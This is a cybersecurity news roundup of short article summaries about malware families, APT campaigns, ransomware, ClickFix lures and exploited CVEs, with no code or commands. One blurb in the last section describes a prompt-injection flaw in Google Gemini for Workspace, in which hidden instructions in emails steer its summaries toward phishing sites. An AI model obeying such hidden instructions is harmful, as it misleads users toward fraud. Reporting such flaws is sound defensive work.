WhatsApp patched a high severity flaw that was reportedly used in targeted attacks. Read more.


Three Lazarus RATs Coming For Your Cheese

Source: Fox-IT
(Published: 01 September 2025)
Fox-IT describes three Lazarus remote access trojans and their tooling used against organizations. Read more.


RapperBot: From Infection to DDoS in a Split Second

Source: Bitsight
(Published: 02 September 2025)
It was just another day at the office – a routine observation led to an investigation into RapperBot activity that quickly escalated from infection to DDoS. Read more.


Predators for Hire: A Global Overview of Commercial Surveillance Vendors

Source: Sekoia.io Blog
(Published: 02 September 2025)
Between November 2023 and July 2024, the Russia-nexus intrusion set APT29 was observed using exploits similar to those used by commercial surveillance vendors, particularly Intellexa’s Predator spyware. Read more.


Google Salesforce Breach: A Deep Dive Into The Chain And Extent Of The Compromise

Source: Seqrite
(Published: 02 September 2025)
The blog analyzes how UNC6040 used vishing and OAuth app abuse to access Google’s Salesforce instance and exfiltrate data. Read more.


Not Safe For Work: Tracking And Investigating Stealerium And Phantom Infostealers

Source: Proofpoint
(Published: 03 September 2025)
Proofpoint tracks Stealerium and Phantom operations and shares techniques, tooling, and indicators. Read more.


Analyzing NotDoor: Inside APT28’s Expanding Arsenal

Source: LAB52 (S2 Grupo)
(Published: 03 September 2025)
LAB52 identified a new Outlook backdoor attributed to APT28 that can monitor for trigger words and exfiltrate data while executing attacker commands. Read more.


Interview #7 Cyber Toufan

Source: deepdarkCTI
(Published: 03 September 2025)
Read more.


Cato CTRL Threat Research: Threat Actors Abuse Simplified AI to Steal Microsoft 365 Credentials

Source: Cato Networks
(Published: 04 September 2025)
AI marketing platforms have exploded in popularity, becoming everyday tools for creative teams in enterprises worldwide. Read more.


GhostRedirector poisons Windows servers: Backdoors with a side of Potatoes

Source: ESET WeLiveSecurity
(Published: 04 September 2025)
ESET researchers identified a new threat actor, GhostRedirector, that compromised at least 65 Windows servers mainly in Brazil, Thailand, and Vietnam. Read more.


Operation BarrelFire: NoisyBear targets entities linked to Kazakhstan’s Oil & Gas Sector

Source: Seqrite
(Published: 04 September 2025)
Seqrite Labs APT-Team has been tracking a new threat group since April 2025 that we track as Noisy Bear, targeting entities in Central Asia’s energy sector. Read more.


Threat Actors Impersonate Microsoft Teams To Deliver Odyssey macOS Stealer Via Clickfix

Source: CloudSEK
(Published: 05 September 2025)
CloudSEK describes a fake Microsoft Teams download site that executes a base64 AppleScript to install the Odyssey macOS stealer. Read more.


Salt Typhoon 2025

Source: Silent Push
(Published: 08 September 2025)
Silent Push has identified dozens of previously unreported domains, all aiming to obtain long-term, stealthy access to targeted organizations, used by the Chinese APT group, Salt Typhoon. Read more.


Scattered Lapsus Hunters Leak Google Fire Experts Data

Source: Hackread
(Published: 04 September 2025)
Scattered Lapsus$ Hunters threaten Google, demanding that two security experts, one from Google’s Threat Intelligence Group and the other from Mandiant, be fired or they will leak alleged stolen Google data. Read more.


Unmasking The Gentlemen Ransomware: Tactics, Techniques, And Procedures

Source: Trend Micro Research
(Published: 09 September 2025)
Trend Micro profiles the Gentlemen ransomware group, highlighting environment-specific evasion and abuse of legitimate tools. Read more.


Blurring The Lines: Intrusion Shows Connection With Three Major Ransomware Gangs

Source: RedPacket Security
(Published: 09 September 2025)
A DFIR case links tooling and artifacts across Play, Ransomhub, and DragonForce ransomware activity. Read more.


Pondering My Orb: A Look at PolarEdge Adjacent Infrastructure

Source: Censys
(Published: 28 August 2025)
We explore several services and certificates that frequently accompany verified PolarEdge botnet certificates. Read more.


TinyLoader Malware Cryptocurrency Theft Infrastructure

Source: Hunt.io
(Published: 02 September 2025)
Malware loaders have become a common part of today’s cybercrime operations because they give attackers a reliable way to get into systems and then bring in whatever tools they need. Read more.


Unveiling a Python Stealer: Inf0s3c Stealer

Source: Cyfirma
(Published: 29 August 2025)
Cyfirma’s threat intelligence assessment reveals Inf0s3c Stealer, a Python-based grabber designed to collect system information and user data. Read more.


Unmasked: Salat Stealer – A Deep Dive into its Advanced Persistence Mechanisms and C2 Infrastructure

Source: Cyfirma
(Published: 05 September 2025)
CYFIRMA has identified Salat Stealer (also known as WEB_RAT), a sophisticated Go-based infostealer targeting Windows systems. Read more.


Operation Hankook: Phantom North Korean APT37 Targeting South Korea

Source: Seqrite
(Published: 29 August 2025)
Seqrite Lab has uncovered a campaign in which threat actors are leveraging the “National Intelligence Research Society Newsletter – Issue 52” as a decoy document to lure victims. Read more.


Suspicious Domain Activity Targeting 2026 FIFA World Cup Tournament

Source: Bfore.ai
(Published: August 2025)
In the lead-up to major global events, cybercriminals are quick to launch fraudulent schemes like fake websites and counterfeit online stores. Read more.


Scattered Spider Overview

Source: Lares Labs
(Published: 27 August 2025)
At Lares, we specialize in threat simulation and adversarial collaboration with our clients, replicating the tactics, techniques, and procedures (TTPs) observed in the latest cybercriminal groups. Read more.


For a deeper look at DDoS attacks, see the Malware Patrol blog post “Spoofed DDoS Attacks and BCP 38”.

Security Signals (08/12/25 – 08/26/25)


This Edition’s Articles

Coordinated Brute Force Campaign Targets Fortinet SSL VPNs

Source: GreyNoise
(Published: 12 August 2025)
On August 3, 2025 GreyNoise observed a significant spike in brute-force traffic targeting Fortinet SSL VPNs. Read more.


Persistent Risk: XZ Utils Backdoor Still Lurking in Docker Images

Source: Binarly
(Published: 12 August 2025)
In this blog we share a new finding in the XZ Utils saga: several Docker images built around the time of the compromise contain the backdoor. Read more.


Malvertising campaign leads to PS1Bot, a multi-stage malware framework

Source: Cisco Talos
(Published: 12 August 2025)
Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework implemented in PowerShell and C#. Read more.


Threat Bulletin: Fire in the Woods – A New Variant of FireWood

Source: Intezer
(Published: 13 August 2025)
FireWood is a Linux backdoor discovered by ESET’s research team. Read more.


‘Blue Locker’ Analysis: Ransomware Targeting Oil and Gas Sector in Pakistan

Source: Resecurity
(Published: 14 August 2025)
This ransomware attack targeted a major enterprise in Pakistan’s oil and gas sector around the country’s Independence Day. Read more.


PhantomCard: New NFC-driven Android malware emerging in Brazil

Source: ThreatFabric
(Published: 14 August 2025)
We introduce PhantomCard, a new Android NFC-based trojan targeting banking customers in Brazil and potentially expanding globally. Read more.


CISA Warns of Attacks Exploiting N-able Vulnerabilities

Source: SecurityWeek
(Published: 14 August 2025)
CISA reported becoming aware of attacks exploiting CVE-2025-8875 and CVE-2025-8876 in N-able N-central on the day they were patched. Read more.


Ghost-Tapping and the Chinese Cybercriminal Retail Fraud Ecosystem

Source: Recorded Future
(Published: 14 August 2025)
We observed criminals buying and selling stolen goods on Telegram marketplaces such as Huione Guarantee and Xinbi Guarantee. Read more.


Cisco Discloses Critical RCE Flaw in Firewall Management Software

Source: Infosecurity Magazine
(Published: 15 August 2025)
Cisco revealed a critical RCE flaw tracked as CVE-2025-20265 and urged customers to apply software updates. Read more.


BlackMatter Ransomware Overview

Source: ANY.RUN
(Published: 18 August 2025)
BlackMatter is a fast-moving ransomware strain that encrypts local and network data, disables recovery mechanisms, and forces organizations to negotiate. Read more.


Apache ActiveMQ attackers patch critical vuln after breaking in

Source: The Register
(Published: 19 August 2025)
Criminals exploiting a critical ActiveMQ vulnerability fixed the flaw post-intrusion to help hide persistence on Linux servers. Read more.


Oregon Man Charged with Administering “Rapper Bot” DDoS-for-Hire Botnet

Source: U.S. Department of Justice (USAO-AK)
(Published: 19 August 2025)
An Oregon man was charged in Alaska for allegedly developing and administering the “Rapper Bot” DDoS-for-hire botnet. Read more.


New Research Links VPN Apps, Highlights Security Deficiencies

Source: SecurityWeek
(Published: 19 August 2025)
Citizen Lab identified links between multiple VPN providers and multiple weaknesses in their mobile apps. Read more.


A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor

Source: Google Cloud Blog (Threat Intelligence)
(Published: 20 August 2025)
Mandiant detailed a campaign where a downloader delivers CORNFLAKE.V3 malware as part of financially motivated operations. Read more.


Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth

Source: Unit 42 (Palo Alto Networks)
(Published: 21 August 2025)
Unit 42 observed attackers exploiting CVE-2024-36401 to deploy SDKs or modified apps that monetize victims’ bandwidth via network sharing. Read more.


Fake macOS help sites push Shamos infostealer via ClickFix technique

Source: Help Net Security
(Published: 25 August 2025)
Criminals are tricking macOS users into running commands that install the Shamos infostealer, using a social engineering tactic known as ClickFix. Read more.



Security Signals (07/29/25 – 08/12/25)


Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators feeds help you apply them. Get free access to machine readable OSINT that helps you monitor emerging risks, validate indicators, and proactively defend your environment.


This Edition’s Articles

Adversary Intel: From APTs to Ransomware Groups

ShinyHunters Tactics Now Mirror Scattered Spider
Source: DARK READING
Recent cyber incidents reveal patterns in timing, shared infrastructure, and similar targets. This suggests a coordinated approach, combining ShinyHunters’ data theft with Scattered Spider’s social engineering. Read more.

Unmasking SocGholish: Silent Push Untangles the Malware Web Behind the “Pioneer of Fake Updates” and Its Operator, TA569
Source: SILENT PUSH
SocGholish, managed by TA569, acts as a Malware-as-a-Service provider, selling access to compromised systems. Their main method is fake browser update pop-ups, delivered via JavaScript on hacked sites. Read more.

Attack Surface Watch: Exploring Digital Risks

New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP
Source: The Hacker News
SafeBreach researchers have found a new attack method, Win-DDoS, that could use thousands of public domain controllers to build a botnet for DDoS attacks. Read more.

Over 29,000 Exchange servers unpatched against high-severity flaw
Source: BLEEPING COMPUTER
More than 29,000 Exchange servers are still unpatched for CVE-2025-53786, a flaw that lets attackers move from on-premises Exchange into the Microsoft cloud and take over domains. Read more.

WinRAR zero-day exploited to plant malware on archive extraction
Source: BLEEPING COMPUTER
A recently fixed WinRAR vulnerability (CVE-2025-8088) was used in phishing attacks to install RomCom malware. The bug allowed files to be extracted to any folder chosen by the attackers. Read more.

Incident Radar: Breaches & Attacks

‘Chairmen’ of $100 million scam operation extradited to US
Source: BLEEPING COMPUTER
The U.S. Department of Justice charged four Ghanaian nationals for their roles in a $100M fraud ring involving romance scams and business email compromise. The suspects, extradited from Ghana, allegedly targeted U.S. companies and individuals from 2016 to 2023. Read more.

Threat Lab: Malware & Attack Analysis Deep Dive

CastleLoader
Source: PolySwarm
CastleLoader is a malware loader that has infected 469 devices since May 2025. It uses Cloudflare-themed ClickFix phishing and fake GitHub links to deliver info stealers and RATs. Read more.

Wave of 150 crypto-draining extensions hits Firefox add-on store
Source: BLEEPING COMPUTER
A campaign named ‘GreedyBear’ has targeted Firefox users with 150 fake extensions on the Mozilla add-ons store. These copy well-known crypto wallets like MetaMask and TronLink, stealing over $1,000,000. Read more.

SCENE 1: SoupDealer – Technical Analysis of a Stealth Java Loader Used in Phishing Campaigns Targeting Türkiye
Source: Malwation
A recent malware bypassed almost every public sandbox and antivirus, except Threat.Zone, and even evaded EDR/XDR in real-world incidents. Many banks, ISPs, and organizations were impacted. Read more.

Makop Ransomware Identified in Attacks in South Korea
Source: ASEC
ASEC has identified Makop ransomware attacks targeting South Korean users. The ransomware is spread through fake resumes, copyright emails, and now uses RDP for attacks. Read more.


InfoSec Articles (07/01/25 – 07/15/25)


Welcome to our biweekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our biweekly blog post is designed to keep you informed and empowered.


Behind the Clouds: Attackers Targeting Governments in Southeast Asia Implement Novel Covert C2 Communication

Source: Unit 42

Researchers discovered HazyBeacon, a sophisticated backdoor targeting government agencies in Southeast Asia. Read more.

Octalyn Stealer Unmasked

Source: CYFIRMA

The Octalyn Forensic Toolkit on GitHub appears to be a research tool but functions as a credential stealer. Built with C++ and Delphi, it uses Telegram for command and control and hides in Windows startup. Read more.

Google Gemini flaw hijacks email summaries for phishing

Source: BLEEPING COMPUTER

Google Gemini for Workspace has a newly discovered vulnerability. Attackers can embed hidden instructions in emails that manipulate Gemini’s summary generation, potentially directing users to phishing sites. Read more.

Dark Web Profile: Arkana Ransomware

Source: SOCRadar

Arkana Ransomware made headlines attacking WOW! internet provider in March 2025. Linked to Qilin Ransomware network, they disguise extortion as “post-penetration testing services.” Read more.

Likely Belarus-Nexus Threat Actor Delivers Downloader to Poland

Source: BLEEPING COMPUTER

The FrostyNeighbor threat group (UNC1151), attributed to Belarus, is actively targeting Eastern European nations with malicious CHM files. Read more.

295 Malicious IPs Launch Coordinated Brute-Force Attacks on Apache Tomcat Manager

Source: The Hacker News

Researchers discovered 295 malicious IP addresses launching coordinated brute-force attacks against Apache Tomcat Manager interfaces worldwide. Read more.

Hackers are exploiting critical RCE flaw in Wing FTP Server

Source: BLEEPING COMPUTER

A Wing FTP Server vulnerability is being actively exploited by threat actors. The flaw allows unauthenticated remote code execution with full system privileges. Read more.

macOS.ZuRu Resurfaces | Modified Khepri C2 Hides Inside Doctored Termius App

Source: SentinelOne

macOS.ZuRu malware hides in fake versions of popular apps like iTerm2 and Remote Desktop. Hackers trick users through poisoned search results. Read more.

GreyNoise Identifies New Scraper Botnet Concentrated in Taiwan

Source: GreyNoise

A scraper botnet variant has been identified with the user-agent “Hello-World/1.0”. Researchers are tracking it through unique behavioral patterns. Read more.

Count(er) Strike – Data Inference Vulnerability in ServiceNow

Source: Varonis

Researchers discovered a critical ServiceNow vulnerability dubbed “Count(er) Strike” that could expose sensitive data across hundreds of tables. It required only basic user access to exploit. Read more.
